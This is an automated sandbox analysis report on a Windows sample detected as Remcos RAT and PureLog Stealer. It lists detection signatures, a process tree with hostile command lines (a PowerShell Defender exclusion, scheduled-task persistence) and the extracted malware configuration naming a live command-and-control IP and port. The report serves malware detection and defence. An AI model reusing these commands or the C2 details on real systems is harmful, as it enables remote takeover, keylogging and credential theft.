Windows Analysis Report
LdSbZG1iH6.exe

Overview

General Information

Sample name: LdSbZG1iH6.exe (renamed because original name is a hash value)
Original sample name: 04e6dda7961928fadeecd13e02b9195d31a5e3a9925d4de51072089bc7a1b452.exe
Analysis ID: 1569374
MD5: b2618fbb2e344dbdc7d4b33947d71531
SHA1: a56c4724edef9a8fef490520ecaeb30c8356e314
SHA256: 04e6dda7961928fadeecd13e02b9195d31a5e3a9925d4de51072089bc7a1b452
Tags: exe, user-adrian__luca

Detection

Remcos, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • LdSbZG1iH6.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\LdSbZG1iH6.exe" MD5: B2618FBB2E344DBDC7D4B33947D71531)
    • powershell.exe (PID: 7476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7884 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7556 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LdSbZG1iH6.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\LdSbZG1iH6.exe" MD5: B2618FBB2E344DBDC7D4B33947D71531)
      • iexplore.exe (PID: 7776 cmdline: "c:\program files (x86)\internet explorer\iexplore.exe" MD5: 6F0F06D6AB125A99E43335427066A4A1)
  • DGlxtFUfY.exe (PID: 7840 cmdline: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe MD5: B2618FBB2E344DBDC7D4B33947D71531)
    • schtasks.exe (PID: 8024 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • DGlxtFUfY.exe (PID: 8072 cmdline: "C:\Users\user\AppData\Roaming\DGlxtFUfY.exe" MD5: B2618FBB2E344DBDC7D4B33947D71531)
      • DGlxtFUfY.exe (PID: 1148 cmdline: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\xgyrrizik" MD5: B2618FBB2E344DBDC7D4B33947D71531)
      • DGlxtFUfY.exe (PID: 1904 cmdline: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\ijdkrtkjyyuu" MD5: B2618FBB2E344DBDC7D4B33947D71531)
      • DGlxtFUfY.exe (PID: 6948 cmdline: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe /stext "C:\Users\user\AppData\Local\Temp\sdjcslvdtgmhffr" MD5: B2618FBB2E344DBDC7D4B33947D71531)
        • WerFault.exe (PID: 7612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 12 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3896 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8072 -s 1676 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZFXG9Y", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown |
  • 0x6adb8:$a1: Remcos restarted by watchdog!
  • 0x6b330:$a3: %02i:%02i:%02i:%03i
00000000.00000002.1995759921.0000000007820000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Source | Rule | Description | Author | Strings
0.2.LdSbZG1iH6.exe.7820000.3.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
0.2.LdSbZG1iH6.exe.7820000.3.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
10.2.DGlxtFUfY.exe.389e300.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
10.2.DGlxtFUfY.exe.389e300.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
10.2.DGlxtFUfY.exe.389e300.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", ProcessId: 7476, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", ProcessId: 7476, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe, ParentImage: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe, ParentProcessId: 7840, ParentProcessName: DGlxtFUfY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpECC1.tmp", ProcessId: 8024, ProcessName: schtasks.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", ProcessId: 7556, ProcessName: schtasks.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\LdSbZG1iH6.exe", ProcessId: 7476, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\LdSbZG1iH6.exe", ParentImage: C:\Users\user\Desktop\LdSbZG1iH6.exe, ParentProcessId: 7276, ParentProcessName: LdSbZG1iH6.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DGlxtFUfY" /XML "C:\Users\user\AppData\Local\Temp\tmpD8DB.tmp", ProcessId: 7556, ProcessName: schtasks.exe

Stealing of Sensitive Information

Source: Registry Key set; Author: Joe Security; Data: Details: 30 0F C2 2C CB 87 27 B5 73 01 29 00 61 48 5E 83 B9 4F 86 E5 AA 5F E8 7C 96 D8 0F 42 54 17 4E BF 7B A5 07 D4 67 96 82 F2 12 1B 41 44 29 9A 6D 78 8B FC 46 0B 7D 55 F7 8F 55 20 99 5B F5 67 C4 ED 74 61 F1 6B 42 C7 17 BF 4B 15 2F 2E , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LdSbZG1iH6.exe, ProcessId: 7748, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-ZFXG9Y\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T18:25:40.472495+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 192.3.64.152 | 2559 | TCP
2024-12-05T18:25:54.159943+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49741 | 192.3.64.152 | 2559 | TCP
2024-12-05T18:25:54.331790+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 192.3.64.152 | 2559 | TCP
2024-12-05T18:26:00.831798+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 192.3.64.152 | 2559 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T18:25:43.074908+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 178.237.33.50 | 80 | TCP

AV Detection

Source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: Remcos {"Host:Port:Password": ["192.3.64.152:2559:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZFXG9Y", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe; ReversingLabs: Detection: 68%
Source: LdSbZG1iH6.exe; ReversingLabs: Detection: 68%
Source: Yara match; File source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.2909444366.000000000322E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.2909062652.0000000001711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000E.00000002.2908866970.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: DGlxtFUfY.exe PID: 8072, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe; Joe Sandbox ML: detected
Source: LdSbZG1iH6.exe; Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_004338C8
Source: LdSbZG1iH6.exe, 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_2f619aee-4

Exploits

Source: Yara match; File source: 10.2.DGlxtFUfY.exe.389e300.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.LdSbZG1iH6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 8.2.LdSbZG1iH6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.LdSbZG1iH6.exe.491ec58.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 10.2.DGlxtFUfY.exe.389e300.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.LdSbZG1iH6.exe.491ec58.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.LdSbZG1iH6.exe.3f1dbb8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000A.00000002.2041108951.000000000389E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1992230249.000000000491E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1992230249.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.1992230249.0000000003F1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: LdSbZG1iH6.exe PID: 7276, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: LdSbZG1iH6.exe PID: 7748, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: DGlxtFUfY.exe PID: 7840, type: MEMORYSTR

Privilege Escalation

Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_00407538 _wcslen,CoGetObject,8_2_00407538
Source: LdSbZG1iH6.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: LdSbZG1iH6.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ZPyJ.pdb source: LdSbZG1iH6.exe, DGlxtFUfY.exe.0.dr
Source: Binary string: ZPyJ.pdbSHA256 source: LdSbZG1iH6.exe, DGlxtFUfY.exe.0.dr
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_0040928E
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_0041C322
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_0040C388
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_004096A0
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_00408847
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_00407877 FindFirstFileW,FindNextFileW,8_2_00407877
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_0040BB6B
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_00419B86
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_0040BD72
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe; Code function: 14_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,14_2_100010F1
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe; Code function: 16_2_0040AE51 FindFirstFileW,FindNextFileW,16_2_0040AE51
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe; Code function: 17_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,17_2_00407EF8
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 8_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,8_2_00407CD2
Source: C:\Users\user\Desktop\LdSbZG1iH6.exe; Code function: 4x nop then jmp 059BB683h, 0_2_059BB13A
Source: C:\Users\user\AppData\Roaming\DGlxtFUfY.exe; Code function: 4x nop then jmp 06DDA90Bh, 10_2_06DDA3C2

Networking

Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49735 -> 192.3.64.152:2559
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 192.3.64.152:2559
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 192.3.64.152:2559
Source: Network traffic; Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49743 -> 192.3.64.152:2559
Source: Malware configuration extractor; IPs: 192.3.64.152
Source: global traffic; HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View; IP Address: 178.237.33.50
Source: Joe Sandbox View; ASN Name: AS-COLOCROSSINGUS
Source: Network traffic; Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49736 -> 178.237.33.50:80
Source: unknown; TCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: unknownTCP traffic detected without corresponding DNS query: 192.3.64.152
                      Source: C:\Users\user\Desktop\LdSbZG1iH6.exeCode function: 8_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,8_2_0041B411
                      Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                      Source: DGlxtFUfY.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
